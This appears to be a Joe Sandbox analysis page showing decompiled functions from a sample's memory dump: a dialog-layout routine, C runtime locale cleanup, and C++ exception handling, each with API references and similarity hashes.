0x00a43e18
0x00a43e1c
0x00a43e1e
0x00a43e22
0x00a43e28
0x00a43e4f
0x00a43e62
0x00a43e66
0x00a43e6f
0x00a43e7a
0x00a43e7b
0x00a43e82
0x00000000
0x00000000
0x00a43e8f
0x00a43e92
0x00a43ea3
0x00a43ea7
0x00a43eb0
0x00a43eeb
0x00a43eeb
0x00a43efb
0x00a43f08
0x00000000
0x00000000
0x00a43f0a
0x00a43f0c
0x00a43f0f
0x00a43f12
0x00a43f18
0x00a43f1c
0x00a43f1e
0x00a43f1e
0x00a43f20
0x00a43f30
0x00a43f35
0x00000000
0x00a43f35
0x00a43eb2
0x00a43eb6
0x00a43eb8
0x00a43ec4
0x00a43ec6
0x00a43ecc
0x00a43ece
0x00a43ed9
0x00a43edb
0x00a43ede
0x00a43ede
0x00a43ee3
0x00a43ee7
0x00000000
0x00a43f3a
0x00a43f3a
0x00000000
0x00a43f3a

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: 7c6b952de22e9b0c5d6d490ab17390c0312fa7258949b4733fb22833352ad810
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: 0231F6B6A147568FCB18DF28C85126EBBE0FBA5314F10492DE4D9C7342C735EA0ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A3E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00A3E2E8(struct HWND__* __ecx, void* __edx, void* __eflags, intOrPtr _a8) {
				char _v0;
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t95;
				struct HWND__* _t106;
				signed int _t119;
				signed int _t134;
				signed int _t145;
				void* _t150;
				void* _t155;
				char _t156;
				void* _t157;
				signed int _t158;
				intOrPtr _t160;
				void* _t163;
				void* _t169;
				long _t170;
				signed int _t174;
				void* _t178;
				signed int _t179;
				signed int _t186;
				struct HWND__* _t187;
				struct HWND__* _t188;
				void* _t189;
				void* _t192;
				signed int _t193;
				long _t194;
				void* _t201;
				int* _t202;
				struct HWND__* _t203;
				void* _t205;
				void* _t206;
				void* _t208;
				void* _t210;
				void* _t214;
				signed int _t221;

				_t178 = __edx;
				_t203 = __ecx;
				_v2368.bottom = __ecx;
				E00A34092( &_v2208, 0x50, L"$%s:", _a8);
				_t208 =  &_v2368 + 0x10;
				E00A41DA7( &_v2208,  &_v2288, 0x50);
				_t95 = E00A53E90( &_v2300);
				_t187 = _v8;
				_t155 = 0;
				_v2376 = _t95;
				_t210 =  *0xa6e720 - _t155; // 0x64
				if(_t210 <= 0) {
					L8:
					_t156 = E00A3D81C(_t155, _t203, _t178, _t189, _t214, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t156;
					GetWindowRect(_t187,  &_v2352);
					GetClientRect(_t187,  &(_v2320.top));
					_t169 = _v2352.right - _v2352.left + 1;
					_t179 = _v2320.bottom;
					_t192 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t205 = _t192 - _v2304;
					_v2368.bottom = _t169 - _t179;
					if(_v0 == 0) {
						if(_t156 != 0) {
							_t158 = 0x64;
							asm("cdq");
							_t134 = _v2292 * _v2368.top;
							_t160 = _t179 * _v2368.right / _t158 + _v2352.right;
							_v2324 = _t160;
							asm("cdq");
							_t186 = _t134 % _v2352.top;
							_v2352.left = _t134 / _v2352.top + _t205;
							asm("cdq");
							asm("cdq");
							_t201 = (_t192 - _v2352.left - _t186 >> 1) + _v2336;
							_t163 = (_t169 - _t160 - _t186 >> 1) + _v2352.bottom;
							if(_t163 < 0) {
								_t163 = 0;
							}
							if(_t201 < 0) {
								_t201 = 0;
							}
							_t145 =  !(GetWindowLongW(_t187, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204;
							_t221 = _t145;
							 *0xa93150(_t187, 0, _t163, _t201, _v2324, _v2352.left, _t145);
							GetWindowRect(_t187,  &_v2368);
							_t156 = _v2393;
						}
						if(E00A3D89C(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t187,  &_v2048);
						}
					}
					_t206 = _t205 - GetSystemMetrics(8);
					_t106 = GetWindow(_t187, 5);
					_t188 = _t106;
					_v2368.bottom = _t188;
					if(_t156 == 0) {
						L23:
						return _t106;
					} else {
						_t157 = 0;
						while(_t188 != 0) {
							__eflags = _t157 - 0x200;
							if(_t157 >= 0x200) {
								goto L23;
							}
							GetWindowRect(_t188,  &_v2320);
							_t170 = _v2320.top.left;
							_t193 = 0x64;
							asm("cdq");
							_t194 = _v2320.left;
							asm("cdq");
							_t119 = (_t170 - _t206 - _v2336) * _v2368.top;
							asm("cdq");
							_t174 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0xa93150(_t188, 0, (_t194 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t194 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t193, 0x204);
							_t106 = GetWindow(_t188, 2);
							_t188 = _t106;
							__eflags = _t188 - _v2384;
							if(_t188 == _v2384) {
								goto L23;
							}
							_t157 = _t157 + 1;
							__eflags = _t157;
						}
						goto L23;
					}
				} else {
					_t202 = 0xa6e274;
					do {
						if( *_t202 > 0) {
							_t9 =  &(_t202[1]); // 0xa64788
							_t150 = E00A56740( &_v2288,  *_t9, _t95);
							_t208 = _t208 + 0xc;
							if(_t150 == 0) {
								_t12 =  &(_t202[1]); // 0xa64788
								if(E00A3D9F0(_t155, _t203, _t202,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t187,  *_t202,  &_v2048);
								}
							}
							_t95 = _v2368.top;
						}
						_t155 = _t155 + 1;
						_t202 =  &(_t202[3]);
						_t214 = _t155 -  *0xa6e720; // 0x64
					} while (_t214 < 0);
					goto L8;
				}
			}

0x00a3e2e8
0x00a3e300
0x00a3e30a
0x00a3e30e
0x00a3e313
0x00a3e325
0x00a3e32f
0x00a3e334
0x00a3e33b
0x00a3e33e
0x00a3e342
0x00a3e348
0x00a3e3a5
0x00a3e3bd
0x00a3e3c5
0x00a3e3c9
0x00a3e3d5
0x00a3e3e7
0x00a3e3ee
0x00a3e3f2
0x00a3e3f5
0x00a3e3fd
0x00a3e40b
0x00a3e40f
0x00a3e417
0x00a3e424
0x00a3e427
0x00a3e430
0x00a3e435
0x00a3e43b
0x00a3e43f
0x00a3e440
0x00a3e446
0x00a3e450
0x00a3e457
0x00a3e460
0x00a3e464
0x00a3e468
0x00a3e46a
0x00a3e46a
0x00a3e46e
0x00a3e470
0x00a3e470
0x00a3e483
0x00a3e483
0x00a3e496
0x00a3e4a2
0x00a3e4a8
0x00a3e4a8
0x00a3e4d0
0x00a3e4db
0x00a3e4db
0x00a3e4d0
0x00a3e4ec
0x00a3e4ee
0x00a3e4f4
0x00a3e4f6
0x00a3e4fc
0x00a3e5ae
0x00a3e5ae
0x00a3e502
0x00a3e502
0x00a3e59c
0x00a3e509
0x00a3e50f
0x00000000
0x00000000
0x00a3e51b
0x00a3e525
0x00a3e53a
0x00a3e53f
0x00a3e542
0x00a3e558
0x00a3e560
0x00a3e562
0x00a3e563
0x00a3e56b
0x00a3e57d
0x00a3e584
0x00a3e58d
0x00a3e593
0x00a3e595
0x00a3e599
0x00000000
0x00000000
0x00a3e59b
0x00a3e59b
0x00a3e59b
0x00000000
0x00a3e59c
0x00a3e34a
0x00a3e34a
0x00a3e34f
0x00a3e352
0x00a3e355
0x00a3e35d
0x00a3e362
0x00a3e367
0x00a3e378
0x00a3e382
0x00a3e38f
0x00a3e38f
0x00a3e382
0x00a3e395
0x00a3e395
0x00a3e399
0x00a3e39a
0x00a3e39d
0x00a3e39d
0x00000000
0x00a3e34f

APIs

_swprintf.LIBCMT ref: 00A3E30E

Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5

Part of subcall function 00A41DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00A71030,?,00A3D928,00000000,?,00000050,00A71030), ref: 00A41DC4

_strlen.LIBCMT ref: 00A3E32F
SetDlgItemTextW.USER32(?,00A6E274,?), ref: 00A3E38F
GetWindowRect.USER32(?,?), ref: 00A3E3C9
GetClientRect.USER32(?,?), ref: 00A3E3D5
GetWindowLongW.USER32(?,000000F0), ref: 00A3E475
GetWindowRect.USER32(?,?), ref: 00A3E4A2
SetWindowTextW.USER32(?,?), ref: 00A3E4DB
GetSystemMetrics.USER32(00000008), ref: 00A3E4E3
GetWindow.USER32(?,00000005), ref: 00A3E4EE
GetWindowRect.USER32(00000000,?), ref: 00A3E51B
GetWindow.USER32(00000000,00000002), ref: 00A3E58D

Strings

$%s:, xrefs: 00A3E302
d, xrefs: 00A3E3F5
CAPTION, xrefs: 00A3E4BD

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 2757928fc3a1d0cf2e33502ab7db727b80d0fa6b41eee9c0af331e9f190642b1
Instruction ID: a5651c255e3929e747a51754e36137cff61afbf732cc2795a6ed763671fdd7d5
Opcode Fuzzy Hash: 2757928fc3a1d0cf2e33502ab7db727b80d0fa6b41eee9c0af331e9f190642b1
Instruction Fuzzy Hash: 4B818172608301AFDB10DFA8CD89A6FBBF9FBC9704F04091DFA8497290D671E9058B52

Uniqueness

Uniqueness Score: -1.00%

Function 00A5CB22 Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00A5CB22(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xa6eea0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00A58DCC(_t46);
							E00A5C701( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00A58DCC(_t47);
							E00A5C7FF( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00A58DCC( *((intOrPtr*)(_t74 + 0x7c)));
						E00A58DCC( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00A58DCC( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00A58DCC( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00A58DCC( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00A58DCC( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00A5CC95( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xa6e968) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00A58DCC(_t31);
							E00A58DCC( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00A58DCC(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00A58DCC(_t74);
			}

0x00a5cb2a
0x00a5cb2e
0x00a5cb36
0x00a5cb3f
0x00a5cb44
0x00a5cb4b
0x00a5cb53
0x00a5cb5b
0x00a5cb66
0x00a5cb6c
0x00a5cb6d
0x00a5cb75
0x00a5cb7d
0x00a5cb88
0x00a5cb8e
0x00a5cb92
0x00a5cb9d
0x00a5cba3
0x00a5cb44
0x00a5cba4
0x00a5cbac
0x00a5cbbf
0x00a5cbd2
0x00a5cbe0
0x00a5cbeb
0x00a5cbf0
0x00a5cbf9
0x00a5cc01
0x00a5cc02
0x00a5cc08
0x00a5cc0b
0x00a5cc0e
0x00a5cc15
0x00a5cc17
0x00a5cc1b
0x00a5cc23
0x00a5cc2a
0x00a5cc30
0x00a5cc31
0x00a5cc31
0x00a5cc38
0x00a5cc3a
0x00a5cc3f
0x00a5cc47
0x00a5cc4c
0x00a5cc4d
0x00a5cc4d
0x00a5cc50
0x00a5cc53
0x00a5cc56
0x00a5cc59
0x00a5cc59
0x00a5cc6b

APIs

___free_lconv_mon.LIBCMT ref: 00A5CB66

Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C71E
Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C730
Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C742
Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C754
Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C766
Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C778
Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C78A
Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C79C
Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C7AE
Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C7C0
Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C7D2
Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C7E4
Part of subcall function 00A5C701: _free.LIBCMT ref: 00A5C7F6

_free.LIBCMT ref: 00A5CB5B

Part of subcall function 00A58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?), ref: 00A58DE2
Part of subcall function 00A58DCC: GetLastError.KERNEL32(?,?,00A5C896,?,00000000,?,00000000,?,00A5C8BD,?,00000007,?,?,00A5CCBA,?,?), ref: 00A58DF4

_free.LIBCMT ref: 00A5CB7D
_free.LIBCMT ref: 00A5CB92
_free.LIBCMT ref: 00A5CB9D
_free.LIBCMT ref: 00A5CBBF
_free.LIBCMT ref: 00A5CBD2
_free.LIBCMT ref: 00A5CBE0
_free.LIBCMT ref: 00A5CBEB
_free.LIBCMT ref: 00A5CC23
_free.LIBCMT ref: 00A5CC2A
_free.LIBCMT ref: 00A5CC47
_free.LIBCMT ref: 00A5CC5F

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 3cf5ccda5d75f8e686a642673f10b6a1324ecfb29a856519d3a29455c11caade
Instruction ID: d7fdb312e231c5442b170847c1f1d5219db112e165f33d76836505d7fe72235e
Opcode Fuzzy Hash: 3cf5ccda5d75f8e686a642673f10b6a1324ecfb29a856519d3a29455c11caade
Instruction Fuzzy Hash: 9B313E326003099FEB21AB38D946B5A77F9FF10722F155419E958E7196DF39EC88CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00A52E31 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E00A52E31(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t261;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t275 = E00A53DAA(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E00A58D24(_t270, _t296, _t301, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if(__eflags == 0) {
						return _t201;
					} else {
						_push(_t315);
						_push(_t301);
						_t202 = E00A52AEC(_t271, _t275, _t296, _t301, _t315, __eflags);
						__eflags =  *(_t202 + 8);
						if(__eflags != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E00A52AEC(_t271, _t275, _t296, 0, _t315, __eflags);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E00A50961(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E00A50894(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E00A52DB1(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E00A58D24(_t271, _t296, 0, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t184 = _t272 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						_t342 = _t270[0x1c];
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
							_t224 = E00A52AEC(_t270, _t275, _t296, _t301, 0, _t342);
							_t343 =  *((intOrPtr*)(_t224 + 0x10));
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E00A52AEC(_t270, _t275, _t296, _t301, 0, _t343) + 0x10);
								_t259 = E00A52AEC(_t270, _t275, _t296, _t301, 0, _t343);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0) {
									goto L67;
								} else {
									if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
										L16:
										_t261 = E00A52AEC(_t270, _t275, _t296, _t301, _t315, _t350);
										_t351 =  *((intOrPtr*)(_t261 + 0x1c)) - _t315;
										if( *((intOrPtr*)(_t261 + 0x1c)) == _t315) {
											L23:
											_t296 = _v8;
											_t275 = _v12;
											L24:
											_v52 = _t301;
											_v48 = 0;
											__eflags =  *_t270 - 0xe06d7363;
											if( *_t270 != 0xe06d7363) {
												L57:
												__eflags = _t301[3];
												if(__eflags <= 0) {
													goto L60;
												} else {
													__eflags = _a24;
													if(__eflags != 0) {
														goto L67;
													} else {
														_push(_a32);
														_push(_a28);
														_push(_t275);
														_push(_t301);
														_push(_a16);
														_push(_t296);
														_push(_a8);
														_push(_t270);
														L68();
														_t332 = _t332 + 0x20;
														goto L60;
													}
												}
											} else {
												__eflags = _t270[0x10] - 3;
												if(_t270[0x10] != 3) {
													goto L57;
												} else {
													__eflags = _t270[0x14] - 0x19930520;
													if(_t270[0x14] == 0x19930520) {
														L29:
														_t315 = _a32;
														__eflags = _t301[3];
														if(_t301[3] > 0) {
															_push(_a28);
															E00A50894(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
															_t296 = _v64;
															_t332 = _t332 + 0x18;
															_t247 = _v68;
															_v44 = _t247;
															_v16 = _t296;
															__eflags = _t296 - _v56;
															if(_t296 < _v56) {
																_t290 = _t296 * 0x14;
																__eflags = _t290;
																_v32 = _t290;
																do {
																	_t291 = 5;
																	_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																	_t332 = _t332 + 0xc;
																	__eflags = _v104 - _t250;
																	if(_v104 <= _t250) {
																		__eflags = _t250 - _v100;
																		if(_t250 <= _v100) {
																			_t294 = 0;
																			_v20 = 0;
																			__eflags = _v92;
																			if(_v92 != 0) {
																				_t299 = _t270[0x1c];
																				_t251 =  *((intOrPtr*)(_t299 + 0xc));
																				_t252 = _t251 + 4;
																				__eflags = _t252;
																				_v36 = _t252;
																				_t253 = _v88;
																				_v40 =  *_t251;
																				_v24 = _t253;
																				do {
																					asm("movsd");
																					asm("movsd");
																					asm("movsd");
																					asm("movsd");
																					_t327 = _v40;
																					_t314 = _v36;
																					__eflags = _t327;
																					if(_t327 <= 0) {
																						goto L40;
																					} else {
																						while(1) {
																							_push(_t299);
																							_push( *_t314);
																							_t254 =  &_v84;
																							_push(_t254);
																							L87();
																							_t332 = _t332 + 0xc;
																							__eflags = _t254;
																							if(_t254 != 0) {
																								break;
																							}
																							_t299 = _t270[0x1c];
																							_t327 = _t327 - 1;
																							_t314 = _t314 + 4;
																							__eflags = _t327;
																							if(_t327 > 0) {
																								continue;
																							} else {
																								_t294 = _v20;
																								_t253 = _v24;
																								goto L40;
																							}
																							goto L43;
																						}
																						_push(_a24);
																						_push(_v28);
